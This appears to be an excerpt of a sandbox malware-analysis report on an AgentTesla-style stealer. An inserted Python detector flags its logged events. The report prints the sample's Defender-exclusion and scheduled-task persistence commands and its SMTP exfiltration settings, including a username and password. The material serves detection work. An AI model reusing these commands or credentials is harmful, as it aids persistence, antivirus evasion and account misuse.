Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp89F4.tmp.bat"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7704, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 7872, ProcessName: svchost.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7792, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, ProcessId: 7972, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 7224, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7792, ProcessName: svchost.exe

Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe", ParentImage: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe, ParentProcessId: 7520, ParentProcessName: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 7676, ProcessName: cmd.exe

No Snort rule has matched
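The Sigma event lines above are flat "Key: value, Key: value" records (Sysmon-style: EventID 3 for network connections, 11 for file creation, 13 for registry value writes, and process-start records without an EventID). As an added example, not the report's or Sigma's own code, the following Python parses records of that shape copied from the section above (the conhost start is included as a benign control) and encodes the checks the matched rules capture: .NET framework utilities making outbound connections, and specifically to mail-submission ports; PowerShell adding a Defender exclusion; schtasks and Run-key persistence pointing into the user profile; and a system process name written or launched outside C:\Windows. The rule names, the port list and the binary lists are this example's assumptions, not Sigma's.

```python
import re

# Event data copied from the Sigma section of the report above (Data: part only).
EVENTS = [
    r"DestinationIp: 185.230.214.164, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7752, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49739",
    r"DestinationIp: 104.26.13.205, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7752, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49732",
    r"EventID: 11, Image: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe, ProcessId: 7520, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe",
    r'Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7792, ProcessId: 7972, ProcessName: powershell.exe',
    r"Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 7224, ProcessId: 7792, ProcessName: svchost.exe",
    r'Details: "C:\Users\user\AppData\Roaming\svchost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe, ProcessId: 7520, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost',
    r"""Command: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , CommandLine: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , Image: C:\Windows\System32\schtasks.exe, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7676, ProcessId: 7748, ProcessName: schtasks.exe""",
    r"Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, Image: C:\Windows\System32\conhost.exe, ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7792, ProcessId: 7800, ProcessName: conhost.exe",
]

# Assumed lists: .NET utilities abused as injection/hollowing hosts, names that belong
# only under C:\Windows, and mail-submission ports (the report shows 587).
DOTNET_UTILS = {"msbuild.exe", "installutil.exe", "regsvcs.exe", "regasm.exe",
                "caspol.exe", "jsc.exe", "addinprocess32.exe"}
SYSTEM_NAMES = {"svchost.exe", "conhost.exe", "csrss.exe", "lsass.exe", "services.exe", "winlogon.exe"}
MAIL_PORTS = {"25", "465", "587", "2525"}

# Split only at ", " that is followed by a field name and ": ", so commas and
# colons inside command lines and registry paths survive.
FIELD_SPLIT = re.compile(r", (?=[\w|]+: )")


def parse_event(record):
    """Turn one 'Key: value, Key: value' record into a dict; empty values are kept as ''."""
    fields = {}
    for part in FIELD_SPLIT.split(record):
        key, _, value = part.partition(": ")
        fields[key] = value.strip()
    return fields


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def under_windows(path):
    return path.lower().startswith("c:\\windows\\")


def evaluate(ev):
    """Return the list of rule names (assumed names) that one parsed event trips."""
    hits = []
    image = ev.get("Image", "")
    cmd = ev.get("CommandLine", "").lower()
    if ev.get("EventID") == "3" and basename(image) in DOTNET_UTILS:
        hits.append("dotnet_utility_outbound_connection")
        if ev.get("DestinationPort") in MAIL_PORTS:
            hits.append("dotnet_utility_smtp_connection")
    if "add-mppreference" in cmd and "-exclusionpath" in cmd:
        hits.append("powershell_defender_exclusion")
    if basename(image) == "schtasks.exe" and "/create" in cmd and "\\appdata\\" in cmd:
        hits.append("schtasks_from_user_profile")
    if (ev.get("EventID") == "13"
            and "\\currentversion\\run\\" in ev.get("TargetObject", "").lower()
            and "\\appdata\\" in ev.get("Details", "").lower()):
        hits.append("autorun_key_to_user_profile")
    for path in (image, ev.get("TargetFilename", "")):
        if path and basename(path) in SYSTEM_NAMES and not under_windows(path):
            hits.append("system_process_name_outside_windows")
            break
    return hits


def scan(records):
    """Evaluate every record; returns one hit list per record, in input order."""
    return [evaluate(parse_event(r)) for r in records]


if __name__ == "__main__":
    for record, hits in zip(EVENTS, scan(EVENTS)):
        ev = parse_event(record)
        print(f"PID {ev.get('ProcessId')} EventID {ev.get('EventID', 'start'):>5}: {hits or 'no hits'}")
```

The MSBuild connection to 104.26.13.205:443 fires only the generic "utility makes an outbound connection" check, while the 185.230.214.164:587 connection also fires the SMTP check; together with the Run-key and schtasks hits that is exactly the combination a responder should treat as an AgentTesla-style stealer rather than a developer running a build.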


AV Detection

Source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack; Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.zoho.eu", "Username": "logs@astonherald.com", "Password": "office12#"}
Source: C:\Users\user\AppData\Roaming\svchost.exe; ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Roaming\svchost.exe; Virustotal: Detection: 36%
Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe; ReversingLabs: Detection: 36%
Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe; Virustotal: Detection: 25%
Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe; Joe Sandbox ML: detected

Exploits

Source: Yara match; File source: 0000000A.00000002.1920918632.000002168033C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.1993738956.000001A48033C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001B.00000002.1950991965.0000028E8033C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1664238561.000002091F69C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe PID: 7520, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: svchost.exe PID: 7792, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: svchost.exe PID: 7872, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: svchost.exe PID: 7748, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: svchost.exe PID: 8396, type: MEMORYSTR
Source: unknown; HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb1; source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.VisualBasic.ni.pdb; source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbv; source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb; source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.ni.pdbRSDS; source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
Source: Binary string: System.Windows.Forms.ni.pdb; source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
Source: Binary string: System.Drawing.ni.pdb; source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l; source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
Source: Binary string: AddInProcess32.pdbpw; source: AddInProcess32.exe, 00000025.00000002.2930648063.0000000005F60000.00000004.00000020.00020000.00000000.sdmp, vexplorers.exe, 00000034.00000000.1950262138.00000000008B2000.00000002.00000001.01000000.0000000B.sdmp, vexplorers.exe.15.dr
Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb; source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS&; source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
Source: Binary string: System.Drawing.ni.pdbRSDS; source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
Source: Binary string: .pdbHJ; source: svchost.exe, 00000008.00000002.1993163112.000000A226562000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb; source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.pdb; source: WERBC7D.tmp.dmp.31.dr
Source: Binary string: System.Windows.Forms.pdb`; source: WERA82A.tmp.dmp.18.dr
Source: Binary string: System.pdb; source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb; source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb; source: svchost.exe, 00000008.00000002.2008517923.000001A4FFF58000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.VisualBasic.pdb; source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
Source: Binary string: System.Core.ni.pdb; source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
Source: Binary string: C:\Users\user\AppData\Roaming\svchost.PDB; source: svchost.exe, 00000008.00000002.1993163112.000000A226562000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.pdb; source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, 00000025.00000002.2930648063.0000000005F60000.00000004.00000020.00020000.00000000.sdmp, vexplorers.exe, 00000034.00000000.1950262138.00000000008B2000.00000002.00000001.01000000.0000000B.sdmp, vexplorers.exe.15.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: svchost.exe, 00000008.00000002.2007386416.000001A4FE0AC000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: pC:\Users\user\AppData\Roaming\svchost.PDB@ source: svchost.exe, 00000008.00000002.1993163112.000000A226562000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: System.Drawing.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: Microsoft.VisualBasic.pdbp^y source: WERD370.tmp.dmp.40.dr
                    Source: Binary string: mscorlib.ni.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: 91\??\C:\Windows\symbols\dll\mscorlib.pdbx source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF76000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb\??\C:\Windows\mscorlib.pdb source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Core.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb- source: WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: svchost.PDB source: svchost.exe, 00000008.00000002.1993163112.000000A226562000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\mscorlib.pdban) source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.ni.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: mscorlib.pdbSystem.Windows.Forms.ni.dllMZ source: WERBC7D.tmp.dmp.31.dr
                    Source: Binary string: mscorlib.pdb@Yx source: WERD370.tmp.dmp.40.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeCode function: 4x nop then jmp 00007FFD9B8B22DFh0_2_00007FFD9B8B0620
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeCode function: 4x nop then jmp 00007FFD9B8B46FCh0_2_00007FFD9B8B44F5
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4x nop then jmp 00007FFD9B8822DFh8_2_00007FFD9B880620
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4x nop then jmp 00007FFD9B8846FCh8_2_00007FFD9B8844F5
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4x nop then jmp 00007FFD9B8A22DFh10_2_00007FFD9B8A19A9
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4x nop then jmp 00007FFD9B8A46FCh10_2_00007FFD9B8A44F5
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4x nop then jmp 00007FFD9B8722DFh27_2_00007FFD9B870620
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4x nop then jmp 00007FFD9B8746FCh27_2_00007FFD9B87451C
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4x nop then jmp 00007FFD9B8B22DFh41_2_00007FFD9B8B0620
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4x nop then jmp 00007FFD9B8B46FCh41_2_00007FFD9B8B44F5

                    Networking

                    barindex
                    Source: Yara matchFile source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.svchost.exe.21690133730.2.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.4:49739 -> 185.230.214.164:587
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                    Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: ip-api.com
                    Source: global trafficTCP traffic: 192.168.2.4:49739 -> 185.230.214.164:587
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: global trafficDNS traffic detected: DNS query: smtp.zoho.eu
                    Source: InstallUtil.exe, 0000000F.00000002.2920560159.0000000005D70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2870944580.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2874204896.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CE1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005D80000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CC0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2870897490.0000000000DC6000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2870404709.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2930648063.0000000005F60000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2926843010.0000000005F90000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2871849560.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002DE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0
                    Source: InstallUtil.exe, 0000000F.00000002.2920560159.0000000005D70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2870944580.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2874204896.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CE1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005D80000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CC0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2870897490.0000000000DC6000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2870404709.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2930648063.0000000005F60000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2926843010.0000000005F90000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2871849560.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002DE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p
